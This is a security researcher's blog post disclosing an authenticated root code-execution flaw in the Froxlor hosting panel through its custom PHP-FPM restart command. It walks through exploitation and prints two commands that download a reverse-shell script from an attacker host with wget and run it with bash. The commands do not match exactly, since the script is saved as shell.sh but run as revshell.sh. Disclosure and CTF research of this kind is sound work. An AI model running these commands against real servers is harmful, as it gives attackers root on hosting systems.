Disclosing Froxlor V2.x Authenticated RCE as Root Vulnerability via PHP-FPM
A story of a vulnerability in Froxlor that allowed authenticated remote code execution as root. This vulnerability exists on the latest version of Froxlor, including v2.x.
Introduction
I was playing one of the recent CTFs on HackTheBox and the challenge involved getting admin credentials for a Froxlor instance. The intended way was to enumerate the Froxlor instance and moving on from there. However, I noticed a way to getting a root shell exploiting an unknown vulnerability in Froxlor. This post will detail the vulnerability and the steps I took to exploit it, along with a PoC and exploit code.
Froxlor
Froxlor is an open-source server management panel that allows users to manage web hosting services. It is written in PHP and uses MySQL as a database backend. Froxlor is used by many hosting providers to manage their servers and services.
Though it’s a server management panel, it doesn’t provide intentionally a way to execute arbitrary code on the server as root, not even as www-data.
Story
The vulnerability I found in Froxlor is an authenticated remote code execution as root. An attacker who has admin credentials can exploit this vulnerability to execute arbitrary code on the server as root.
After I found the vulnerability, I immediately went to the Froxlor GitHub repository and thought of reporting it. However, I found out that they are not accepting any security reports related to privileged users.
Okay, then I decided to contact the Froxlor team via Discord and they were maddeningly defensive about the issue. They said that it’s not a vulnerability and it’s a feature. I told them I explored this in a CTF challenge and they even mocked me for that.
Okay, let us introduce the public to this feature then.
Vulnerability
Froxlor allows admin users to set custom PHP-FPM restart commands in the panel. Of course, this is a feature and it’s intended to be used for restarting PHP-FPM services. However, the is not sanitized properly and an attacker can bypass the sanitization and execute arbitrary commands on the server as root.
Exploitation
Step 1: Get Admin Credentials
After getting admin credentials, login to the Froxlor panel.
Step 2: Set Custom PHP-FPM Restart Command
Go to PHP -> PHP-FPM versions and set a custom PHP-FPM restart command as shown in the image below.
This input is highly sanitized, it doesn’t allow many characters including ;, &, |, >, <, //. However, we can still transfer a reverse shell to the server using wget and after that, we can execute the reverse shell. So two commands are needed to exploit this vulnerability.
First: wget ATTACKER_IP/revshell.sh -O /tmp/shell.sh
Second: /bin/bash /tmp/revshell.sh
As seen, we didn’t use any of the restricted characters to execute the reverse shell.
Step 3: Restart PHP-FPM
After setting the custom PHP-FPM restart command, go to System -> Settings and click on PHP-FPM. After that, click on disable, wait for a few seconds, and click on enable. This will restart the PHP-FPM service and execute the reverse shell.
Due to cron jobs, the PHP-FPM service restarts every 5 minutes, so you need to wait a few minutes to get the reverse shell. Furthermore, it’s a constant-time operation, meaning it always runs at 5-minute intervals, like 12:05, 12:10, 12:15, etc.
Step 4: Get a Root Shell
After executing the reverse shell, you will get a root shell on the server, even though the service is running as www-data.
PoC Video
I have created a PoC for this vulnerability. You can watch the video below to see the PoC in action. The reason it’s a bit of a long video is that almost %95 of the video is waiting for the PHP-FPM service to restart. But you’ll get a root shell at the end, so it’s worth watching.
Exploit Code
I have also created a Python script to exploit this vulnerability. You can visit the GitHub repository to inspect the exploit code.
https://github.com/sarperavci/Froxlor-Authenticated-root-RCE-Exploit
Conclusion
This vulnerability in Froxlor allows an attacker to execute arbitrary code on the server as root. The vulnerability is due to improper sanitization of the custom PHP-FPM restart command. The Froxlor team doesn’t consider this a vulnerability and they are not accepting any security reports related to privileged users. However, I believe that this is something worthy for penetration testers and security researchers to know about. You can’t just ignore a direct root shell on a server.